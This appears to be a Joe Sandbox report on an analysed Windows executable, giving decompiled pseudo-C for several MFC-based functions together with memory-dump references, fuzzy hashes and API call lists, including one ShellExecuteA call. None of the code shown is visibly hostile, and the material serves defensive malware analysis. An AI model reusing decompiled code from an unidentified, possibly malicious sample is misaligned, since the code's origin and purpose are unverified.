Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: H_prolog$#800$#1168#2514#324#537#540#641#858LoadString
String ID:
API String ID: 3636429178-0
Opcode ID: 079a5a0ea27ea08026c5f88583863dd71d13bd13b14e4cd4cc9af8f3e812d7c4
Instruction ID: 878488aec4b2856a91e7876fdea7b42093e14cff2befce779b0cd2c99bb2152f
Opcode Fuzzy Hash: 079a5a0ea27ea08026c5f88583863dd71d13bd13b14e4cd4cc9af8f3e812d7c4
Instruction Fuzzy Hash: 54016D31D103589ADB24EB60E956BEDB774AF14318F10069EA012671D1DFB82F84CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004097EC, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E004097EC(void* __ecx) {
				void* _t18;
				signed int _t29;
				void* _t31;

				E0043E4E0(0x43f85f, _t31);
				 *(_t31 - 0x10) =  *(_t31 - 0x10) & 0x00000000;
				_push( *((intOrPtr*)(_t31 + 0xc)));
				_push(_t31 + 0xc);
				_t18 = E0040FEA7();
				_t29 = 1;
				_push(":");
				 *(_t31 - 4) = _t29;
				L0043DFD6();
				_push(_t18 + 1);
				_push( *((intOrPtr*)(_t31 + 8)));
				L0043E13E();
				 *(_t31 - 0x10) = _t29;
				 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t31 - 0xc));
				return  *((intOrPtr*)(_t31 + 8));
			}

0x004097f1
0x004097f7
0x004097fc
0x00409802
0x00409803
0x0040980f
0x00409810
0x00409815
0x00409818
0x00409821
0x00409822
0x00409825
0x0040982a
0x0040982d
0x00409834
0x00409840
0x00409848

APIs

__EH_prolog.LIBCMT ref: 004097F1

Part of subcall function 0040FEA7: __EH_prolog.LIBCMT ref: 0040FEAC
Part of subcall function 0040FEA7: IsWindow.USER32(?), ref: 0040FEC5
Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0040FEDC
Part of subcall function 0040FEA7: #823.MFC42(-000000C5), ref: 0040FEEA
Part of subcall function 0040FEA7: memset.MSVCRT ref: 0040FEF7
Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000D,-000000CA,?), ref: 0040FF0B
Part of subcall function 0040FEA7: #537.MFC42(?), ref: 0040FF13
Part of subcall function 0040FEA7: #825.MFC42(?,?), ref: 0040FF1F
Part of subcall function 0040FEA7: #535.MFC42(?,?), ref: 0040FF2C
Part of subcall function 0040FEA7: #800.MFC42(?,?), ref: 0040FF38

#2764.MFC42(00453524), ref: 00409818
#5710.MFC42(?,00000001,00453524), ref: 00409825
#800.MFC42(?,00000001,00453524), ref: 00409834

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800H_prologMessageSend$#2764#535#537#5710#823#825Windowmemset
String ID:
API String ID: 3942794176-0
Opcode ID: f0c625165c78dd5b75b17a3423d9af235c8e44988716e9fcd2b404cc72a2c835
Instruction ID: 38d23d530b29cb89d13cd7373147375d43b4f6515e3bb08c437ac0a9450b317e
Opcode Fuzzy Hash: f0c625165c78dd5b75b17a3423d9af235c8e44988716e9fcd2b404cc72a2c835
Instruction Fuzzy Hash: D0F01D72800158BBDF15EF51D852BDD7B64EB18368F10D41FF4255A181DB78A708CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004090A3, Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E004090A3(void* __ecx) {
				void* _t18;
				signed int _t28;
				void* _t30;

				E0043E4E0(0x43f74b, _t30);
				 *(_t30 - 0x10) =  *(_t30 - 0x10) & 0x00000000;
				_push( *((intOrPtr*)(_t30 + 0xc)));
				_push(_t30 + 0xc);
				_t18 = E0040FEA7();
				_t28 = 1;
				_push(0x453480);
				 *(_t30 - 4) = _t28;
				L0043DFD6();
				_push(_t18);
				_push( *((intOrPtr*)(_t30 + 8)));
				L0043DFD0();
				 *(_t30 - 0x10) = _t28;
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return  *((intOrPtr*)(_t30 + 8));
			}

0x004090a8
0x004090ae
0x004090b3
0x004090b9
0x004090ba
0x004090c6
0x004090c7
0x004090cc
0x004090cf
0x004090d4
0x004090d8
0x004090db
0x004090e0
0x004090e3
0x004090ea
0x004090f6
0x004090fe

APIs

__EH_prolog.LIBCMT ref: 004090A8

Part of subcall function 0040FEA7: __EH_prolog.LIBCMT ref: 0040FEAC
Part of subcall function 0040FEA7: IsWindow.USER32(?), ref: 0040FEC5
Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0040FEDC
Part of subcall function 0040FEA7: #823.MFC42(-000000C5), ref: 0040FEEA
Part of subcall function 0040FEA7: memset.MSVCRT ref: 0040FEF7
Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000D,-000000CA,?), ref: 0040FF0B
Part of subcall function 0040FEA7: #537.MFC42(?), ref: 0040FF13
Part of subcall function 0040FEA7: #825.MFC42(?,?), ref: 0040FF1F
Part of subcall function 0040FEA7: #535.MFC42(?,?), ref: 0040FF2C
Part of subcall function 0040FEA7: #800.MFC42(?,?), ref: 0040FF38

#2764.MFC42(00453480), ref: 004090CF
#4129.MFC42(?,00000000,00453480), ref: 004090DB
#800.MFC42(?,00000000,00453480), ref: 004090EA

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800H_prologMessageSend$#2764#4129#535#537#823#825Windowmemset
String ID:
API String ID: 2193304076-0
Opcode ID: 2eb937e2106b350fa2831798c2fbacd6a7e061da3da283dfba564bfa428832de
Instruction ID: 8a6cc1eb11a7df0f8281dd5e51cc0731eacc3b518e9305bdaf75eb62320b9e86
Opcode Fuzzy Hash: 2eb937e2106b350fa2831798c2fbacd6a7e061da3da283dfba564bfa428832de
Instruction Fuzzy Hash: 54F03A32800118BBCB15EF51D846BDE7B64EF18368F10C01FF4265A181DBBCA708CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040A916, Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E0040A916(void* __ecx) {
				void* _t18;
				signed int _t28;
				void* _t30;

				E0043E4E0(0x43fb27, _t30);
				 *(_t30 - 0x10) =  *(_t30 - 0x10) & 0x00000000;
				_push( *((intOrPtr*)(_t30 + 0xc)));
				_push(_t30 + 0xc);
				_t18 = E0040FEA7();
				_t28 = 1;
				_push(0x453480);
				 *(_t30 - 4) = _t28;
				L0043DFD6();
				_push(_t18);
				_push( *((intOrPtr*)(_t30 + 8)));
				L0043DFD0();
				 *(_t30 - 0x10) = _t28;
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return  *((intOrPtr*)(_t30 + 8));
			}

0x0040a91b
0x0040a921
0x0040a926
0x0040a92c
0x0040a92d
0x0040a939
0x0040a93a
0x0040a93f
0x0040a942
0x0040a947
0x0040a94b
0x0040a94e
0x0040a953
0x0040a956
0x0040a95d
0x0040a969
0x0040a971

APIs

__EH_prolog.LIBCMT ref: 0040A91B

Part of subcall function 0040FEA7: __EH_prolog.LIBCMT ref: 0040FEAC
Part of subcall function 0040FEA7: IsWindow.USER32(?), ref: 0040FEC5
Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0040FEDC
Part of subcall function 0040FEA7: #823.MFC42(-000000C5), ref: 0040FEEA
Part of subcall function 0040FEA7: memset.MSVCRT ref: 0040FEF7
Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000D,-000000CA,?), ref: 0040FF0B
Part of subcall function 0040FEA7: #537.MFC42(?), ref: 0040FF13
Part of subcall function 0040FEA7: #825.MFC42(?,?), ref: 0040FF1F
Part of subcall function 0040FEA7: #535.MFC42(?,?), ref: 0040FF2C
Part of subcall function 0040FEA7: #800.MFC42(?,?), ref: 0040FF38

#2764.MFC42(00453480), ref: 0040A942
#4129.MFC42(?,00000000,00453480), ref: 0040A94E
#800.MFC42(?,00000000,00453480), ref: 0040A95D

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800H_prologMessageSend$#2764#4129#535#537#823#825Windowmemset
String ID:
API String ID: 2193304076-0
Opcode ID: cb63854d36014b6e877932daa48041b5da816602cb4eec392a5e3ee97fcfa9d6
Instruction ID: d64bdd0405a036fbd0413399d0c1a67b28c89d48611757bf7802f6af712cb830
Opcode Fuzzy Hash: cb63854d36014b6e877932daa48041b5da816602cb4eec392a5e3ee97fcfa9d6
Instruction Fuzzy Hash: 30F01772800118BBCB15EF51D852BDEBB64EB18368F10C01FF4265A181DBB8A708CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00419A69, Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00419A69(void* __ecx, void* __eflags) {
				void* __esi;
				void* _t9;
				intOrPtr* _t11;
				void* _t24;

				_t9 = E0043E4E0(0x441180, _t24);
				_push(__ecx);
				_t11 = E0042549E(L004044C9(_t9, __ecx, __ecx));
				if(_t11 == 0) {
					_t11 = E00429029(_t24 - 0x10, 0xe05e);
					_push( *_t11);
					 *(_t24 - 4) =  *(_t24 - 4) & 0x00000000;
					_push(0x426);
					L0043E066();
					L0043E15C();
					 *(_t24 - 4) =  *(_t24 - 4) | 0xffffffff;
					L0043DD36();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t24 - 0xc));
				return _t11;
			}

0x00419a6e
0x00419a73
0x00419a7e
0x00419a85
0x00419a90
0x00419a97
0x00419a99
0x00419a9f
0x00419aa4
0x00419aab
0x00419ab0
0x00419ab7
0x00419ab7
0x00419ac0
0x00419ac8

APIs

__EH_prolog.LIBCMT ref: 00419A6E

Part of subcall function 0042549E: ShellExecuteA.SHELL32(00000000,open,?,nopass,00000000,00000000), ref: 004254E4

Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A

#3092.MFC42(00000426,00000000), ref: 00419AA4
#6199.MFC42(00000426,00000000), ref: 00419AAB
#800.MFC42(00000426,00000000), ref: 00419AB7

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #1168#3092#537#6199#800ExecuteH_prologLoadShellString
String ID:
API String ID: 132703629-0
Opcode ID: ba877fc7b92c41110e75990f08bb3aa5e32a1ea0fcab05b6778409d64a943c06
Instruction ID: 61752d821d52279d2cad19324f45f553d17a3c29e92bb3d57704705d5707f77d
Opcode Fuzzy Hash: ba877fc7b92c41110e75990f08bb3aa5e32a1ea0fcab05b6778409d64a943c06
Instruction Fuzzy Hash: 03F05E31A10214ABDB28A7E2E916BAE7264DB48768F00491FE112A71C1EBBC9D008618

Uniqueness

Uniqueness Score: -1.00%

Function 0041ACB4, Relevance: 6.0, APIs: 4, Instructions: 30
windowCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E0041ACB4(void* __ecx) {
				intOrPtr* _v0;
				long _t8;
				intOrPtr* _t9;

				_t8 = SendMessageA( *(__ecx + 0x88), 0x130b, 0, 0);
				if(_t8 == 0) {
					_push(0);
					L0043E0AE();
					_push(5);
					goto L4;
				} else {
					if(_t8 == 1) {
						_push(0);
						L0043E0AE();
						_push(5);
						L4:
						L0043E0AE();
					}
				}
				_t9 = _v0;
				 *_t9 = 0;
				return _t9;
			}

0x0041accd
0x0041accf
0x0041acea
0x0041acf1
0x0041acf6
0x00000000
0x0041acd1
0x0041acd2
0x0041acd4
0x0041acdb
0x0041ace0
0x0041acfe
0x0041acfe
0x0041acfe
0x0041acd2
0x0041ad03
0x0041ad07
0x0041ad0b

APIs

SendMessageA.USER32(?,0000130B,00000000,00000000), ref: 0041ACC7
#6215.MFC42(00000000), ref: 0041ACDB
#6215.MFC42(00000000), ref: 0041ACF1
#6215.MFC42(00000005,00000000), ref: 0041ACFE

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #6215$MessageSend
String ID:
API String ID: 3418523427-0
Opcode ID: 079d5be2641290db3e97d07e7a9972f625c2ae7487483847405e0a0fd588a0b8
Instruction ID: 08938adbb38db4e61d98dbfb50fc26a15a681cfca6e00ad597d577aab992f928
Opcode Fuzzy Hash: 079d5be2641290db3e97d07e7a9972f625c2ae7487483847405e0a0fd588a0b8
Instruction Fuzzy Hash: A4F02031201B046FC234EB2ADD11FD3B7F4EBD2B11F01441EB08A820949EA0298ACB26

Uniqueness

Uniqueness Score: -1.00%

Function 0041C073, Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 93%

			E0041C073(intOrPtr __ecx, void* __eflags) {
				void* __esi;
				void* _t17;
				void* _t18;
				void* _t20;
				intOrPtr _t30;
				void* _t32;

				_t17 = E0043E4E0(0x44165d, _t32);
				_push(__ecx);
				_t30 = __ecx;
				 *((intOrPtr*)(_t32 - 0x10)) = __ecx;
				 *(_t32 - 4) = 4;
				_t18 = L00404F36(_t17, __ecx + 0x12c, __ecx);
				 *(_t32 - 4) = 3;
				L00404F36(_t18, _t30 + 0xd8, _t30);
				 *(_t32 - 4) = 2;
				L0043DD36();
				 *(_t32 - 4) = 1;
				L0043DD36();
				 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
				_t20 = E0040E116(_t30 + 0x60);
				 *(_t32 - 4) =  *(_t32 - 4) | 0xffffffff;
				L0043E04E();
				 *[fs:0x0] =  *((intOrPtr*)(_t32 - 0xc));
				return _t20;
			}

0x0041c078
0x0041c07d
0x0041c07f
0x0041c081
0x0041c08a
0x0041c091
0x0041c09c
0x0041c0a0
0x0041c0ab
0x0041c0af
0x0041c0ba
0x0041c0be
0x0041c0c3
0x0041c0ca
0x0041c0cf
0x0041c0d5
0x0041c0de
0x0041c0e6

APIs

__EH_prolog.LIBCMT ref: 0041C078
#800.MFC42(?,?,0041C05F), ref: 0041C0AF
#800.MFC42(?,?,0041C05F), ref: 0041C0BE

Part of subcall function 0040E116: __EH_prolog.LIBCMT ref: 0040E11B
Part of subcall function 0040E116: #2414.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E147
Part of subcall function 0040E116: #2414.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E158
Part of subcall function 0040E116: #2414.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E169
Part of subcall function 0040E116: #800.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E175
Part of subcall function 0040E116: #2414.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E18A
Part of subcall function 0040E116: #2414.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E1A5
Part of subcall function 0040E116: #2414.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E1BB
Part of subcall function 0040E116: #800.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E1CC
Part of subcall function 0040E116: #795.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E1D7

#641.MFC42(?,?,0041C05F), ref: 0041C0D5

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #2414$#800$H_prolog$#641#795
String ID:
API String ID: 1560397226-0
Opcode ID: 2bc6a483f3c54e37fc5829869e7dd38312900a4a557679aac73096920e0ce77d
Instruction ID: 99b1f9a0f645c1d20bd82dc7456033321e4b19a352ea70cbd05e69828fe60b05
Opcode Fuzzy Hash: 2bc6a483f3c54e37fc5829869e7dd38312900a4a557679aac73096920e0ce77d
Instruction Fuzzy Hash: DDF0C270801695DAD725EBA5C1127DCFBB0AF19308F00468EE056632C2CBBC2B04CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA1F, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0040EA1F(void* __ecx, intOrPtr _a4) {
				void* _t4;
				intOrPtr _t5;
				intOrPtr* _t7;

				_t5 = _a4;
				_t4 = __ecx + 0x228;
				_push(_t4);
				_push(0x479);
				_push(_t5);
				L0043DF7C();
				_t7 = __ecx + 0x268;
				_push(_t7);
				_push(0x42d);
				_push(_t5);
				L0043E084();
				_push(0x270f);
				_push(1);
				_push( *_t7);
				_push(_t5);
				L0043E258();
				_push(__ecx + 0x68);
				_push(0x5360);
				_push(_t5);
				L0043DF7C();
				return _t4;
			}

0x0040ea20
0x0040ea28
0x0040ea2e
0x0040ea2f
0x0040ea34
0x0040ea35
0x0040ea3a
0x0040ea40
0x0040ea41
0x0040ea46
0x0040ea47
0x0040ea4c
0x0040ea51
0x0040ea53
0x0040ea55
0x0040ea56
0x0040ea5e
0x0040ea5f
0x0040ea64
0x0040ea65
0x0040ea6d

APIs

#2302.MFC42(?,00000479,?), ref: 0040EA35
#2363.MFC42(?,0000042D,?,?,00000479,?), ref: 0040EA47
#2297.MFC42(?,?,00000001,0000270F,?,0000042D,?,?,00000479,?), ref: 0040EA56
#2302.MFC42(?,00005360,?,?,?,00000001,0000270F,?,0000042D,?,?,00000479,?), ref: 0040EA65

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #2302$#2297#2363
String ID:
API String ID: 597119315-0
Opcode ID: 27ad6c7944b5bfc154fb365c62b5ce0f969e24aa8315b1577fc0499fea43e056
